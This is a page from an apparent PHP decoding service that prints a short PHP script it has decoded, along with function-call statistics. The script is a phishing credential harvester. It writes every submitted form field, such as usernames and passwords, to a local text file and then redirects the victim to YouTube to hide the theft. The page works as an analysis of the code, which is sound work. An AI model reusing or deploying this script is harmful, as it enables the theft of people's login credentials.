Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php header ('Location:https://www.youtube.com/'); $handle = fopen("usernames.txt", "a"..
Decoded Output download
<?php
header ('Location:https://www.youtube.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "======= http://narmar3.blogspot.com/ ========
");
fclose($handle);
exit;
?>
Did this file decode correctly?
Original Code
<?php
header ('Location:https://www.youtube.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "======= http://narmar3.blogspot.com/ ========\r\n");
fclose($handle);
exit;
?>
Function Calls
header | 1 |
Stats
MD5 | e73b2a46086ca01857ff528da7e9a0b9 |
Eval Count | 0 |
Decode Time | 161 ms |